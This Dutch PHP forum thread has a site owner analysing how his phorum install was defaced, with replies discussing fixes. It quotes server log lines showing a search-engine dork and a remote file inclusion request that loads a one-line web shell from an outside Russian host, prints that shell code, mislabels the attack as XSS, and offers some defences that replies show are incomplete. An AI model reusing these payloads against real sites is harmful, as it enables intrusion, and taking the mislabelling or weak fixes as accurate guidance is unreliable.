Veiligheidsbreuk, gehacked, XSS

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Productontwikkelaar Food

Wat ga je doen Als Productontwikkelaar Food ga je nieuwe producten ontwikkelen en bestaande producten verbeteren. Je bent hierbij betrokken bij het gehele proces: van productconcept naar proefreceptuur, het realiseren va het product (op kleine schaal) en het testen van producten in een productieomgeving. Verder: Bewaak je de status van verschillende fases van productontwikkeling en lever je tijdig de benodigde data aan Ben je bezig met de optimalisatie van oude en nieuwe recepturen Begeleid of organiseer je proefsessies (sensorisch onderzoek) in het team en/of bij klanten Onderhoud je contacten met de klanten, leveranciers van grondstoffen e.a. externe partijen Houd je

Bekijk vacature »

.NET Developer Azure

Dit ga je doen Je werkzaamheden zullen onder andere bestaan uit: Het ontwerpen en bouwen van hoge kwaliteit software, zowel back-end als front-end; Het meedenken over de architectuur, nieuwe tooling, ontwikkelingen en technologieën in de markt; De aansluiting zoeken met testen, beheer en analyses; Het samenwerken in een Scrumteam; Ondersteunen en coachen van teamgenoten; Reviewen van technische haalbaarheid. Hier ga je werken De organisatie waar je als .NET Developer komt te werken houdt zich bezig met het bouwen van oplossingen ter ondersteuning van de intensieve zorg in Nederland. Hierdoor kennen de applicaties tal van koppelingen met externe systemen van toonaangevende

Bekijk vacature »

Front-end Developer

Front-end Developers opgelet! Bij Luminis zijn ze opzoek naar jou. Lees de vacature en solliciteer direct. Luminis is een software- en technologiebedrijf met meerdere vestigingen. Vanuit deze vestigingen werken 200 professionals aan technisch hoogwaardige oplossingen voor klanten zoals KLM, Nike en Bol.com. Ook ontwikkelt Luminis eigen oplossingen op het gebied van cloud, Internet of Things, data intelligence, e-sports en e-learning. Luminis onderscheidt zich door aantoonbaar voorop te lopen in technologie en innovatie. Luminis heeft drie kernpunten die verankerd zitten in alles wat we doen: het omarmen van nieuwe technologie, meesterschap en kennis delen. Functiebeschrijving First things first! Het is belangrijk

Bekijk vacature »

Senior Frontend developer

Wat wij bieden hybride werken,met als uitgangspunt 50% op kantoor en 50% vanuit huis; opleidingsmogelijkheden op basis van behoefte en ambitie; dus geen vast budget; flexibele werktijden en direct een contract voor onbepaalde tijd; 20 vakantiedagen en daarnaast 4,7% van je salaris om flexibel in te vullen, bijvoorbeeld goed voor 7 extra vakantiedagen; een mobiliteitsbudget dat aansluit bij jouw manier van reizen. Wat jij meeneemt een afgeronde technische hbo of wo opleiding; je bent een medior/senior frontend developer die zich wilt blijven ontwikkelen; expert in JavaScript, Angular, React of Vue. De uitdaging Als frontend developer bij Ordina JSRoots ontwerp en

Bekijk vacature »

PHP developer

Ideeën omzetten in code, zodat onze webshops elke dag weer een stapje beter worden. Jij zorgt er als ervaren PHP developer samen met het team voor, dat onze webshops blijven draaien en dat klanten gemakkelijk hun producten kunnen bestellen. Wil jij impact hebben op onze snelgroeiende digitale business in meer dan 12 landen? En online producten verkopen, die bijdragen aan het duurzaam gebruik van onze schaarste waterbronnen? Zo ja, dan zoeken we jou! PHP developer 32-40 uur, in Veghel Je gaat samen met onze E-commerce collega’s de uitdaging aan om MegaGroup uit te laten groeien tot het beste B2B platform

Bekijk vacature »

Senior Java developer (backend)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

Senior .NET Ontwikkelaar

In het kort Als Senior .NET ontwikkelaar ga je binnen onze business unit Transport en Logistiek aan de slag met complexe maatwerk software voor bedrijf kritische systemen binnen de technische automatisering. Denk bijvoorbeeld een IoT-oplossing voor de logistieke sector waarbij we van ruim 200.000 machines de telemetrie en events verwerken. We zijn actief in de distributielogistiek, havenlogistiek (denk aan ECT) en productielogistiek. Naast C# en .NET Core maken we ook gebruik van Azure technologie. En als trotse Microsoft Gold Partner leren we graag van en met jou. Wil jij jezelf blijven ontwikkelen binnen de technische automatisering met .NET, dan gaan

Bekijk vacature »

Senior developer (fullstack)

Wat je gaat doen: Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun je eventueel ook andere ontwikkelaars begeleiden in het softwareontwikkelproces. Verder draag je positief bij aan de teamgeest binnen een projectteam en je kijkt verder dan je eigen rol. Je gaat software maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit levert. Je leert snel vanwege je diepgaande

Bekijk vacature »

(Junior) Java developer Rijksoverheid

Dit ga je doen Software Developers binnen het CJIB spelen een cruciale rol in het functioneren van ons complexe applicatielandschap. Samen werken ze aan de fundamenten van het CJIB en zijn ze sterk gericht op de techniek. Hiermee leveren ze direct en indirect toegevoegde waarde aan de organisatie. De systemen die ze samen als DevOps team ontwikkelen en optimaliseren dragen namelijk bij aan een efficiëntere en persoonsgerichte benadering richting de burgers. Als Junior Software Developer ga jij hier ook mee aan de slag! Voor Toelichting op eindkwalificaties zie bijlage, focus op kolom 'talent', dat zijn de eindkwalificaties die de kandidaat

Bekijk vacature »

Python Developer

Dit ga je doen Jij gaat je als Python Developer voornamelijk bezighouden met: Het importeren en combineren van data(sets); Het schakelen met verschillende onderzoekers en collega's; Het ontwikkelen, testen en implementeren van applicaties en het uitvoeren van controles (Python, JSON); Het ontsluiten van data middels API's; Het maken van koppelingen middels Python en het meedenken over de inzet van Artificial Intelligence/Machine Learning. Hier ga je werken Wat ga je doen? Als Python Developer zul jij je voornamelijk bezig houden met het ontwikkelen, testen en implementeren van applicaties en ligt jouw focus op het combineren van data en slimme oplossingen. De

Bekijk vacature »

Java-softwaredeveloper

Wat je gaat doen: Dit ga je doen Daar kunnen we heel kort over zijn: software ontwikkelen met de agile-/scrumteams van toonaangevende organisaties. Zoals ministeries, gemeentes, financiële instellingen en retail- en energiebedrijven. En als het bij je past, begeleid je collega-developers in het ontwikkelproces. Doordat je tijdelijk aan een opdracht werkt, doe je in korte tijd veel mooie ervaringen op en leer je nieuwe technieken en tools kennen. Je teamleden werken bijvoorbeeld met Spring, JPA/Hibernate, AJAX, REST/JSON, GIT, AWS en TDD. Het interessante is dat jij volledig in control bent en zelf kiest welke opdrachten je oppakt. Het soort rol,

Bekijk vacature »

Freelance applicatieontwikkelaar (zzp)

Belastingdienst B/cao Startdatum : 2-1-2023 Tijdelijke functie, met optie op vast Aantal uren per week : 36 Standplaats in overleg : Apeldoorn Applicatieontwikkelaar bij het Ministerie van Financiën- Belastingdienst We zoeken een consultant/developer met ervaring in de ontwikkeling van back-end systemen. Als consultant heb je kennis en ervaring met de wijze waarop Open Formulieren is opgezet. Je bent een vraagbaak voor collega’s en deelt waar nodig je kennis. Je hebt ervaring met het werken in een open source omgeving. Je bent thuis in verschillende frameworks of je kunt je die snel eigen maken. Je hebt aantoonbaar ruime kennis van en

Bekijk vacature »

Medior Frontend developer

Wat je gaat doen: Of beter nog, wat wil jij doen? Bij DPA GEOS werken onze consultants als Frontend Developer in Agile teams bij onze klanten en zijn ze verantwoordelijk voor de grotere webapplicaties. Wil jij dit ook, want we zijn op zoek naar enthousiaste Frontend Developers om ons development team te versterken. Je draagt positief bij aan de teamgeest binnen een projectteam je kijkt verder dan je eigen rol. Eventueel begeleid je ook andere ontwikkelaars in het softwareontwikkelproces. Je gaat webapplicaties maken voor verschillende opdrachtgevers in jouw regio. Je bent een professional die het IT-vak serieus neemt en kwaliteit

Bekijk vacature »

Java Developer / Sociaal domein

Dit ga je doen Nieuwbouw en doorontwikkeling; Beheer en wanneer nodig onderhoud; Bijdrage leveren in het functioneel- en technisch ontwerptraject; Analyseren van productie verstoringen; Meedenken over vernieuwingen en verbeteringen. Hier ga je werken De organisatie waar jij komt te werken focust zich op software development met een maatschappelijk tintje. De afdeling software ontwikkeling bestaat uit vijf verschillende scrum teams, met allen hun eigen focus gebied. Zo zijn er een aantal teams die zich focussen op specifieke applicaties, maar is er ook een team gericht op projecten. Binnen de organisatie staat innovatie en kwaliteit voorop. Een aantal applicaties draait nog op

Bekijk vacature »

Freelance applicatieontwikkelaar (zzp)

Belastingdienst B/cao Startdatum : 2-1-2023 Tijdelijke functie, met optie op vast Aantal uren per week : 36 Standplaats in overleg : Apeldoorn Applicatieontwikkelaar bij het Ministerie van Financiën- Belastingdienst We zoeken een consultant/developer met ervaring in de ontwikkeling van back-end systemen. Als consultant heb je kennis en ervaring met de wijze waarop Open Formulieren is opgezet. Je bent een vraagbaak voor collega’s en deelt waar nodig je kennis. Je hebt ervaring met het werken in een open source omgeving. Je bent thuis in verschillende frameworks of je kunt je die snel eigen maken. Je hebt aantoonbaar ruime kennis van en

Bekijk vacature »
Arend a

Arend a

12/07/2004 05:07:00
Quote Anchor link
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] "GET /phorum/admin/ HTTP/1.1" 200 5042 "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] "GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1" 403 7591 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST["commando"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= "/home/pad/naar/file";
$variabele = $_POST["naam"];
$variabele = preg_replace('/\W','', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists("${pad}/${variabele}.ext")) {
  include("${pad}/${variabele}.ext");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik 'even' geschreven heb voor het includen in mijn layout. Het 'even' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
PHP hulp

PHP hulp

05/02/2023 05:37:03
 
B a s
Beheerder

B a s

12/07/2004 08:09:00
Quote Anchor link
omg :) maar goed dat je er achter bent gekomen.. maar was 'system()' dan functioneel op je server??
 
SerpenT

SerpenT

12/07/2004 11:37:00
Quote Anchor link
hoe kun je system() dan uitschakelen? op je server? want dit wil ik niet op mijn site laten gebeuren:O.

en nog iets arend:

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST["naam"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

bedoel je hiet niet
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
inculde($_GET["naam"]);
?>

of pakt ie die meegestuurde variabele in de url ook als $_POST["naam"] :O
 
Arend a

Arend a

12/07/2004 11:58:00
Quote Anchor link
Het was laat :)

Maar het system commando uitschaken kan wel, maar dan zjin er nog wel 4 andere manieren om er omheen te kunnen. Je moet gewoon zorgen dat er geen malafide include() verwijzingen zijn.

Grtz,

Arend
Gewijzigd op 12/07/2004 11:59:00 door Arend a
 
Mitch X

Mitch X

12/07/2004 12:00:00
Quote Anchor link
Je laat dat toch nooit zo doen?
Ik deed dat altijd met een switch() die kon dus nooit iets anders dan de door mij ingegeven files.

Nu werk ik niet meer met includes maar das een ander verhaal :)
 
Arend a

Arend a

12/07/2004 12:02:00
Quote Anchor link
mja, dat vind ik persoonlijk nogal lomp. een beetje voor elke file in mn php file gaan pielen. Maar zoals je staat was het een quick fix van twee jaar terug die nog steeds liep.

Verder was de eerste hack een 3rd party script: phorum dat hij dmv googlen ging opzoeken en exploiten.
Gewijzigd op 12/07/2004 12:08:00 door Arend a
 
Bram Z

Bram Z

12/07/2004 13:08:00
Quote Anchor link
Die rus ziet er een profesional uit die moet mijn site niet weten :D
 
Arend a

Arend a

12/07/2004 13:10:00
Quote Anchor link
Professional? Welnee, het is een eerste klas scriptkiddo. Ik heb totaal geen respect voor deze gast. Hij was op de hoogte van een lek, en ging sites opzoeken die die software draaide om te hacken.

Sorry, geen enkel respect at all.
 

19/09/2005 19:52:00
Quote Anchor link
Quote:
Een veiligheidbreuk, een goede daad uit het echte leven.

Ik roep al een redelijke tijd dingen over veiligheid, en nu ik even niet kan slapen ga ik deze kennis ook maar met jullie delen. Gisteren rond een uur of negen werd op vorago.nl een stukje php code: phorum gedefaced door een rus. Een kleine vier uur later heb ik dit forum offline gehaald en ben eens gaan kijken wat er eigenlijk aan de hand was.

De rus in kwestie gaat alsvolgd aan het werk, de eerste http request is:

vorago@vh1:~$ cat onderzoek|head
[09/Jul/2004:20:19:21 +0200] \"GET /phorum/admin/ HTTP/1.1\" 200 5042 \"http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphorum%2Fadmin+%223.3.2a%22&btnG=Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

en vervolgens de exploit:

[09/Jul/2004:20:22:34 +0200] \"GET /phorum/admin/actions/del.php?include_path=http://deface2.narod.ru/shep.php&cmd=ls HTTP/1.1\" 403 7591 \"-\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.51 [ru]\"

de shep.php is een file met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($cmd);
?>


Dit werkt alsvolgd: het forum include eerst de text-only shep.php, gaat deze lokaal uitvoeren en voert dit uit. Dit is het welbekende XSS symtroom: cross site scripting. Hierbij is dus een shell vergeven aan de scriptkiddo. Daar sta ik even van te kijken. Achteraf ben ik blij dat er niet zo gek veel kwaad is geschied. Toch had hij met even doorpielen een mysql wachtwoord kunnen ontfutselen, en door zich niet zo enorm groot en wijd een forum te defacen (wat ik persoonlijk buitengewoon zielig vind) had ik er zelfs niet eens achter gekomen.

Dit is een resultaat van een 3rd party script wat ik niet goed beheerd heb, dit is erg slecht. Doch, ik ben weer wakker geschud. Verder heeft de scriptkiddie in kwestie nog wat rond zitten neuzen bij andere scripts, zonder resultaat.

In het kort komt het hier op neer:
een phpfile fout.php met:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
include($_POST[\"naam\"]);
?>


wordt aangeroepen met:
http://www.jouwsite.nl/fout.php?naam=http://www.mijnsite.com/exploit.php?commando=ls

waarin exploit.php

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
<?
system($_POST[\"commando\"]);
?>


!OF WAT VOOR PHP CODE DAN OOK! bevat.

Wat de oplossing hiervoor is?
persoonlijk gebruik ik preg_replace om mijn invoer te sanatizen.

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
$pad
= \"/home/pad/naar/file\";
$variabele = $_POST[\"naam\"];
$variabele = preg_replace(\'/\\W\',\'\', $variabele);
# zorg dat er alleen letters mogen voorkomen in de variabele.
if (file_exists(\"${pad}/${variabele}.ext\")) {
  include(\"${pad}/${variabele}.ext\");
}

?>


Conclusie: wees alert, niet overmoedig en blijft sanatizen.
Tot mijn schaamte kwam ik een bovenaande compleet foute constructie tegen in een scriptje dat ik \'even\' geschreven heb voor het includen in mijn layout. Het \'even\' iets doen en niet nauwkeurig zijn kan fataal zijn voor je site. Gelukkig heb ik reguliere backups, ook van mysql en zit ik hier redelijk safe. Maar het is gewoon doodzonde om veel werk door een paar eikels teloor zien gaan.
 
Han eev

Han eev

19/09/2005 20:31:00
Quote Anchor link
Waarom doen ze dit?? wat hebben ze eraan?
 
Alfred -

Alfred -

19/09/2005 20:42:00
Quote Anchor link
Waarom worden er virussen gemaakt? Wat heb je er aan als je aan ander zn pc naar de kloten helpt? Juist ja, nog onnuttige vragen Han?
 
Jelmer -

Jelmer -

19/09/2005 20:55:00
Quote Anchor link
1 keer en nooit weer (neem ik aan)
Hoe simpel het ook is eigenlijk.

Ik moet toegeven dat ik ook een paar keer een site ben tegengekomen, waarvan ik dacht 'deze is makkelijk te bewerken'. Dus ben toen even gaan knutselen, en inderdaad, ook zo'n include (andere was trouwens een .inc bestand met wachtwoorden :*) ). Enige verschil is dat ik alleen heb gekeken, en daarna een mailtje heb gestuurd naar de desbetreffende webmaster.

Sterker nog, ik heb een keer (per ongeluk, was niet mijn bedoeling) toegang verkregen tot alle websites die op mijn webhosting werden gehost. Echt asociaal groot lek. Heb het gemeld (even paar screenies voor bewijs, wachtwoorden weggehaald) en blij dat ze waren! Krijg nog een cadeautje ervoor ook :P

Ik had natuurlijk ook al die wachtwoorden op internet kunnen zetten, maar dat wat ik nu heb gedaan voelt toch beter. Lees je dat rus?
 
Pieter van Linschoten

Pieter van Linschoten

19/09/2005 21:16:00
Quote Anchor link
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
<?
if (is_file($_GET['page'].".php"))
{

$include = $_GET['page'];
}
else{
$include = "Home";
}

include($include.".php");
?>
Gewijzigd op 19/09/2005 21:16:00 door Pieter van Linschoten
 
Legolas

Legolas

19/09/2005 21:25:00
Quote Anchor link
misschien moet je dat maar eerst ff vertalen voordat ie het kan lezen Jelmer ^^... En scriptkiddies, die zijn te zielig om sociaal te zijn =P.

Maar system is volgens mij overal geblokt ?. OW ennem wat ik me nou afvraag: hoe kan het in cluden van zo'n bestand nou werken? Ik bedoel de server waar het van komt parsed het ook... Of gaat dat via zielige geocities servers die geen php hebben =P.

Overigens is dit misbruik maken van de hosting, een beetje host wil dan nog wel eens een contract ontbinden =P. http://www.nic.ru/whois/?domain=narod.ru =P.

MJa, ik filter die gets altijd op slashes enzo, dan kunnen urls ook nie =). Net zoals ik tegen sql injection alle tekens van html-entities voorzien (inc. enkele quotes ej: htmlentities($_GET["var"], ENT_QUOTES);)

Mja, er is altijd wel iets =(
 
Eris -

Eris -

19/09/2005 21:28:00
Quote Anchor link
Gana we even oude koeien uit de sloot halen (Topic is een jaar oud)
 
Jelmer -

Jelmer -

19/09/2005 21:52:00
Quote Anchor link
ehe, dat had ik nog niet eens gezien. Stom

Dat van Lapidi lijkt mij ook niet echt veilig. Daarmee kan ik nog steeds cross-site scripten en ieder willekeurig bestand includen. Gewoon .php weglaten.
 
Winston Smith

Winston Smith

20/09/2005 00:02:00
Quote Anchor link
Ik gebruik altijd
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
<?php
// eerst mapje ervoor zetten
include('include/' . $page . '.inc.php');
?>


Dat is toch redelijk veilig, of zie ik iets over het hoofd?

(ook al is het een oud topic ^^)
 
Willem Jan Z

Willem Jan Z

20/09/2005 00:31:00
Quote Anchor link
Met die vraag zit ik eigenlijk ook... Ik dacht gewoon controleren of het bestand wel bestaat...

ik doe wel altijd uizonderingen maken voor bestanden op mijn server, zoals de config enzo... Zodat die niet opgehaald kunnen worden...

Maar dat is dus niet echt veilig blijkbaar...
Ga ik maar eens beetje aan werken...
 
Legolas

Legolas

20/09/2005 07:36:00
Quote Anchor link
gewoon punten en slashes eruit halen dan kan er geen url komen en blijft het in dezelfde map, kan je dus niet ../config.php doen =).
 
Jelmer -

Jelmer -

20/09/2005 07:40:00
Quote Anchor link
inderdaad. Of hem door een switch() / array van bestaande pagina's heen halen.
 
Legolas

Legolas

20/09/2005 08:11:00
Quote Anchor link
dan het beste een in_array, een switch is een beetje te veel werk :P
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.